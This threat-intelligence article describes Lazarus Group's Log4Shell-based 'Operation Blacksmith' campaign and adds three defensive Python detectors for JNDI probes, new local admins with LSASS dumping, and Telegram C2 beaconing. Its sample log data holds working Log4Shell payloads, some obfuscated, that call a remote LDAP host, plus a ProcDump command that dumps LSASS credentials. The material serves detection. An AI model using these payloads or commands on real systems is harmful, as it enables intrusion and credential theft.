Operation Blacksmith – Lazarus Group Exploits Log4Shell Vulnerability in Targeted Attacks

The threat actor known as the Lazarus Group has been identified in a series of attacks dubbed ‘Operation Blacksmith’, in which it exploits the Log4Shell vulnerability (CVE-2021-44228), the JNDI-lookup remote code execution flaw in Apache Log4j 2 disclosed in December 2021. The campaign opportunistically targets enterprises worldwide that still expose unpatched, internet-facing instances of the vulnerable library: a textbook case of n-day exploitation, where the fix has long been available and the attackers count on organizations that never applied it. This article covers the operation, the group’s tactics, and the implications for the targeted sectors.
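The following Python detector is an added example and not part of the original article. It shows what hunting for the exploitation attempts described above looks like in practice: it scans web server access log lines for Log4j `${jndi:...}` lookups, URL-decoding each request and collapsing the `${lower:..}`, `${upper:..}` and `${x:-y}` nesting tricks that scanners use to slip past naive string matching. The log lines are constructed for the example (documentation-range IP addresses, synthetic payloads), and the logic applies to any attacker-controlled text field, such as User-Agent or X-Forwarded-For headers, because the whole line is normalized.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines for demonstration. The IPs come from
# documentation ranges and the payloads are synthetic, not captured traffic.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [12/Dec/2023:10:01:22 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Dec/2023:10:01:40 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.20:1389/a}"
203.0.113.9 - - [12/Dec/2023:10:01:41 +0000] "GET /portal/?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.20%3A1389%2Fb%7D HTTP/1.1" 400 0 "-" "curl/8.0"
203.0.113.11 - - [12/Dec/2023:10:02:03 +0000] "GET /login HTTP/1.1" 200 10 "-" "${${env:NaN:-j}ndi${::-:}${lower:L}dap://198.51.100.20:1389/c}"
203.0.113.12 - - [12/Dec/2023:10:02:30 +0000] "GET /price?currency=${amount} HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

# A lookup whose body contains no further "${" ... "}" nesting.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What a de-obfuscated Log4Shell probe looks like.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:[^{}]*\}", re.IGNORECASE)


def _reduce_lookup(match):
    """Resolve one innermost Log4j lookup.

    Handles the three tricks seen in obfuscated probes: ${lower:X}, ${upper:X}
    and the default-value syntax ${anything:-X}. Anything else (for example the
    final ${jndi:...}) is returned unchanged so the reduction loop terminates.
    """
    body = match.group(1)
    if ":-" in body:                      # ${env:NOPE:-j} and ${::-j} both yield "j"
        return body.split(":-", 1)[1]
    key, _, value = body.partition(":")
    key = key.strip().lower()
    if key == "lower":
        return value.lower()
    if key == "upper":
        return value.upper()
    return match.group(0)


def normalize(text, max_rounds=10):
    """URL-decode and collapse nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        reduced = INNERMOST_LOOKUP.sub(_reduce_lookup, decoded)
        if reduced == text:
            return reduced
        text = reduced
    return text


def find_log4shell_probes(log_text):
    """Return (source_ip, normalized_payload) for every line carrying a JNDI lookup."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        normalized = normalize(line)
        for m in JNDI_LOOKUP.finditer(normalized):
            hits.append((line.split(" ", 1)[0], m.group(0)))
    return hits


if __name__ == "__main__":
    for ip, payload in find_log4shell_probes(SAMPLE_ACCESS_LOG):
        print(f"{ip}\t{payload}")
```

The reduction deliberately leaves `${jndi:...}` untouched and only rewrites the lookups it understands, so the loop converges even on a line that mixes a real probe with unrelated `${...}` text (the `${amount}` line above is not flagged). Running the detector against the page of a vulnerable, internet-exposed service is exactly the kind of check this campaign punishes organizations for skipping.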

Operation Blacksmith: A New Campaign

Lazarus Group’s ‘Operation Blacksmith’ marks a notable shift in the group’s approach: instead of tailoring its entry to each victim, it exploits the same Log4Shell vulnerability against any organization, anywhere, that still runs a vulnerable service on the internet, and uses that foothold to reach critical systems. The campaign’s global reach is a reminder that an unpatched library from 2021 remains a live perimeter weakness for many enterprises.

Targeted sectors

Lazarus Group, known for its sophisticated cyber operations, has concentrated on specific sectors in ‘Operation Blacksmith’: companies in manufacturing, agriculture and physical security have been observed as primary targets. Compromises in these industries can reach beyond data theft into production lines and physical safety, which raises the cost of leaving a known vulnerability exposed.

Extensive reconnaissance

In this campaign the Lazarus Group gathers extensive system information before moving further into the environment. The actors run a series of commands and queries to map the target, including querying Windows event logs and dumping OS credentials, which gives them both an inventory of the compromised host and the credentials they need to move laterally. For defenders, this phase is an opportunity: log queries and credential access leave traces on the host that can be detected before the implant is deployed.

Custom-Made Implant: HazyLoad

The Lazarus Group deploys a custom implant called HazyLoad, which provides direct access to compromised systems. HazyLoad functions as a proxy tool: it maintains a persistent channel into the compromised infrastructure so the actors can reach the host without re-exploiting the vulnerability each time, and it serves as a covert foothold for further activity inside the target network.

Change in Tactics: Local User Account

In ‘Operation Blacksmith’ the Lazarus Group deviates from its usual tactics by creating a local user account with administrative privileges instead of using unauthorized domain-level accounts. The change suggests an attempt to blend in with legitimate administration and to avoid the scrutiny that domain account changes attract. A practical caveat for defenders: local account creation and local group changes are recorded in the Security log of the affected host, not on a domain controller, so monitoring that collects only domain controller events will miss this step entirely.

Shift in Hands-On-Keyboard Phase

The group has also changed how it operates during the hands-on-keyboard phase. It now downloads and runs credential dumping utilities such as ProcDump and Mimikatz: ProcDump is typically used to dump the memory of the LSASS process, and Mimikatz extracts the credentials held in that memory. With those credentials the actors escalate privileges and move deeper into the compromised environment. The shift shows the group’s continuing adaptation, here toward freely available tooling rather than custom malware.
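As an added example that is not from the article, the Python below implements the two host-level detections a SOC would want for the activity described in this section and in the reconnaissance section above: correlating Windows Security events 4720 (user account created) and 4732 (member added to a security-enabled local group) to catch a brand-new member of the local Administrators group, and flagging LSASS dumping from Sysmon process-creation (Event ID 1) and process-access (Event ID 10) records. The event records, hostnames, SIDs and paths are constructed; the field names follow the Windows Security and Sysmon schemas. The match on `OriginalFileName` (the name ProcDump carries in its PE version resource) is what catches a renamed `procdump.exe`.

```python
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of the local Administrators group
PROCESS_VM_READ = 0x0010             # access right required to read another process's memory

# Constructed events in a flattened SIEM-export style (Security 4720/4732, Sysmon 1/10).
# Hosts, accounts, SIDs and paths are invented for the example.
EVENTS = [
    {"time": "2023-12-11T09:14:02", "host": "WEB01", "event_id": 4720,
     "TargetUserName": "svc_backup2", "TargetSid": "S-1-5-21-111-222-333-1105",
     "SubjectUserName": "Administrator"},
    {"time": "2023-12-11T09:14:05", "host": "WEB01", "event_id": 4732,
     "MemberSid": "S-1-5-21-111-222-333-1105", "TargetSid": ADMINISTRATORS_SID,
     "TargetUserName": "Administrators", "SubjectUserName": "Administrator"},
    {"time": "2023-12-11T09:20:40", "host": "WEB01", "event_id": 1,
     "Image": "C:\\Users\\Public\\pd.exe", "OriginalFileName": "procdump",
     "CommandLine": "pd.exe -accepteula -ma lsass.exe C:\\Users\\Public\\l.dmp",
     "User": "WEB01\\svc_backup2"},
    {"time": "2023-12-11T09:20:41", "host": "WEB01", "event_id": 10,
     "SourceImage": "C:\\Users\\Public\\pd.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    # Benign activity that must not fire: helpdesk creates a user and adds it to
    # Remote Desktop Users (S-1-5-32-555); Task Manager opens lsass with query-only access.
    {"time": "2023-12-11T11:02:00", "host": "FS02", "event_id": 4720,
     "TargetUserName": "jsmith", "TargetSid": "S-1-5-21-111-222-333-2201",
     "SubjectUserName": "helpdesk"},
    {"time": "2023-12-11T11:02:09", "host": "FS02", "event_id": 4732,
     "MemberSid": "S-1-5-21-111-222-333-2201", "TargetSid": "S-1-5-32-555",
     "TargetUserName": "Remote Desktop Users", "SubjectUserName": "helpdesk"},
    {"time": "2023-12-11T11:30:00", "host": "FS02", "event_id": 10,
     "SourceImage": "C:\\Windows\\system32\\Taskmgr.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1000"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def local_admin_accounts_created(events, window=timedelta(minutes=30)):
    """Join 4720 to a 4732 that adds the same SID to Administrators on the same host.

    Joining on the SID rather than the name matters: 4732 often reports the member's
    account name as '-' for local accounts, while MemberSid is always populated.
    """
    findings = []
    created = [e for e in events if e["event_id"] == 4720]
    admin_adds = [e for e in events
                  if e["event_id"] == 4732 and e.get("TargetSid") == ADMINISTRATORS_SID]
    for c in created:
        for a in admin_adds:
            if (a["host"] == c["host"] and a.get("MemberSid") == c["TargetSid"]
                    and timedelta(0) <= _ts(a) - _ts(c) <= window):
                findings.append({"host": c["host"], "user": c["TargetUserName"],
                                 "created_by": c["SubjectUserName"],
                                 "created": c["time"], "added_to_admins": a["time"]})
    return findings


def lsass_dump_indicators(events):
    """Flag ProcDump-style LSASS dumps from Sysmon Event 1 and Event 10 records."""
    findings = []
    for e in events:
        if e["event_id"] == 1:
            cmd = e.get("CommandLine", "").lower()
            original = e.get("OriginalFileName", "").lower()
            # Renamed binary: OriginalFileName still says procdump. Plain usage: "-ma lsass".
            if original.startswith("procdump") or ("lsass" in cmd and "-ma" in cmd.split()):
                findings.append({"host": e["host"], "kind": "procdump_lsass",
                                 "image": e.get("Image"), "user": e.get("User"), "time": e["time"]})
        elif e["event_id"] == 10 and e.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            access = int(e.get("GrantedAccess", "0x0"), 16)
            if access & PROCESS_VM_READ:   # reading LSASS memory is what a dump needs
                findings.append({"host": e["host"], "kind": "lsass_read_access",
                                 "image": e.get("SourceImage"), "access": hex(access),
                                 "time": e["time"]})
    return findings


def triage(events):
    """Group both detections per host so the sequence (new local admin, then
    credential dumping under that account) is visible at a glance."""
    by_host = {}
    for f in local_admin_accounts_created(events):
        by_host.setdefault(f["host"], {"new_local_admins": [], "lsass_dumps": []})
        by_host[f["host"]]["new_local_admins"].append(f["user"])
    for f in lsass_dump_indicators(events):
        by_host.setdefault(f["host"], {"new_local_admins": [], "lsass_dumps": []})
        by_host[f["host"]]["lsass_dumps"].append(f["kind"])
    return by_host


if __name__ == "__main__":
    print(triage(EVENTS))
```

In production the Event 10 check needs an allowlist for legitimate LSASS readers (antivirus engines, some backup agents), which is why the example also keeps the stronger Event 1 signal; the two together give an analyst both the tool and the access it obtained.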

Introduction of NineRAT

The second phase of ‘Operation Blacksmith’ reveals the deployment of a previously undocumented Remote Access Trojan (RAT) named ‘NineRAT’. The malware gives the Lazarus Group control over compromised systems and, notably, uses Telegram as its command-and-control (C2) channel: the preliminary commands used to fingerprint infected systems are received over Telegram. Using a mainstream messaging platform’s infrastructure for C2 is a deliberate choice to hide among legitimate traffic.

Utilization of Telegram-based C2 channel

Routing C2 through Telegram lets the operators deliver their fingerprinting commands over a service whose traffic is encrypted and already common on many networks, so the implant’s check-ins do not stand out the way a connection to an unknown server would. For defenders this means that traffic to collaboration and messaging platforms cannot simply be trusted: alerting on Telegram API usage from servers that have no business reason for it, and on machine-like polling patterns in that traffic, belongs in the detection plan.
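The Python below is an added example, not code from the article or from the malware, showing one way to surface the Telegram C2 behaviour described in the two sections above from a web proxy log. It assumes the implant talks to Telegram’s Bot API over HTTPS (`api.telegram.org/bot<token>/<method>`), which is how Telegram-based malware generally works, and that the proxy records the full URL. It groups Bot API calls by client and bot token, measures how regularly the client polls `getUpdates` (the Bot API method for fetching pending messages), and reports the methods used, redacting the token because it is a credential. The log lines and token are constructed.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log: time, client IP, method, URL, status. The token is synthetic
# but follows the Bot API shape <numeric bot id>:<35-character secret>.
PROXY_LOG = """\
2023-12-11T09:30:00 10.20.30.40 POST https://api.telegram.org/bot1234567890:AAHxq3w9C8xTq1b2k4mPn7vR6sF0eY5uZ1w/getUpdates 200
2023-12-11T09:31:00 10.20.30.40 POST https://api.telegram.org/bot1234567890:AAHxq3w9C8xTq1b2k4mPn7vR6sF0eY5uZ1w/getUpdates 200
2023-12-11T09:32:00 10.20.30.40 POST https://api.telegram.org/bot1234567890:AAHxq3w9C8xTq1b2k4mPn7vR6sF0eY5uZ1w/getUpdates 200
2023-12-11T09:33:00 10.20.30.40 POST https://api.telegram.org/bot1234567890:AAHxq3w9C8xTq1b2k4mPn7vR6sF0eY5uZ1w/getUpdates 200
2023-12-11T09:33:02 10.20.30.40 POST https://api.telegram.org/bot1234567890:AAHxq3w9C8xTq1b2k4mPn7vR6sF0eY5uZ1w/sendDocument 200
2023-12-11T09:31:15 10.20.30.55 GET https://web.telegram.org/a/ 200
2023-12-11T09:32:40 10.20.30.55 GET https://api.telegram.org/bot9876543210:BBGyr4x0D9yUr2c3l5nQo8wS7tG1fZ6vA2x/getMe 200
"""

# Bot API URL: the token is group 1, the API method is group 2.
BOT_API = re.compile(r"https://api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]{30,})/(\w+)")


def parse_proxy_log(text):
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url, _status = line.split()
        rows.append({"time": datetime.fromisoformat(ts), "client": client, "url": url})
    return rows


def redact(token):
    """Keep the numeric bot id (useful for pivoting) and drop the secret half."""
    return token.split(":", 1)[0] + ":<redacted>"


def find_bot_api_beacons(text, min_polls=3, max_jitter=0.2):
    """Report every (client, bot token) pair that polls getUpdates at least
    `min_polls` times, with the median poll interval and whether the interval is
    regular enough (relative jitter <= max_jitter) to look like a beacon."""
    groups = defaultdict(list)
    for row in parse_proxy_log(text):
        m = BOT_API.search(row["url"])
        if m:
            groups[(row["client"], m.group(1))].append((row["time"], m.group(2)))

    findings = []
    for (client, token), calls in groups.items():
        calls.sort()
        polls = [t for t, method in calls if method == "getUpdates"]
        if len(polls) < min_polls:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(polls, polls[1:])]
        median = statistics.median(gaps)
        jitter = max(abs(g - median) for g in gaps) / median if median > 0 else float("inf")
        findings.append({
            "client": client,
            "token": redact(token),
            "polls": len(polls),
            "median_interval_s": median,
            "regular": jitter <= max_jitter,
            "methods": sorted({method for _, method in calls}),
        })
    return findings


if __name__ == "__main__":
    for f in find_bot_api_beacons(PROXY_LOG):
        print(f)
```

A server polling a bot at a fixed cadence and then calling `sendDocument` is the shape of "receive command, return results" over Telegram; a workstation using the Telegram web client, or a single `getMe` call, does not trip the logic. Where TLS is not intercepted, the same idea can be applied to DNS or SNI telemetry for `api.telegram.org`, with the API method unavailable but the cadence still measurable.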

Self-Uninstallation Capability

NineRAT can also uninstall itself from the compromised system using a BAT file. Self-deletion is a common anti-forensic step rather than a unique one, but it still complicates response: by the time an analyst reaches the host, the implant binary may be gone, and the scope of the intrusion has to be reconstructed from logs and memory rather than from the malware itself. File-deletion auditing and process-creation logging on servers preserve the evidence the BAT file is designed to remove, which is why proactive detection of these threats matters more than after-the-fact collection.

Lazarus Group’s ‘Operation Blacksmith’, built on exploitation of the Log4Shell vulnerability, poses a significant threat to enterprises worldwide. Its continued success against infrastructure that has been patchable since the vulnerability was disclosed in December 2021, together with its focus on key sectors, shows that the basics still decide outcomes. Organizations should inventory and upgrade every vulnerable Log4j 2 instance, including copies bundled inside vendor products, regularly assess what they expose to the internet, and deploy monitoring that covers host-level account changes, credential access and unusual use of messaging platforms, so that an intrusion that gets past the perimeter is caught before it matures. Staying proactive on these fundamentals is what protects critical systems and sensitive data against campaigns like this one.
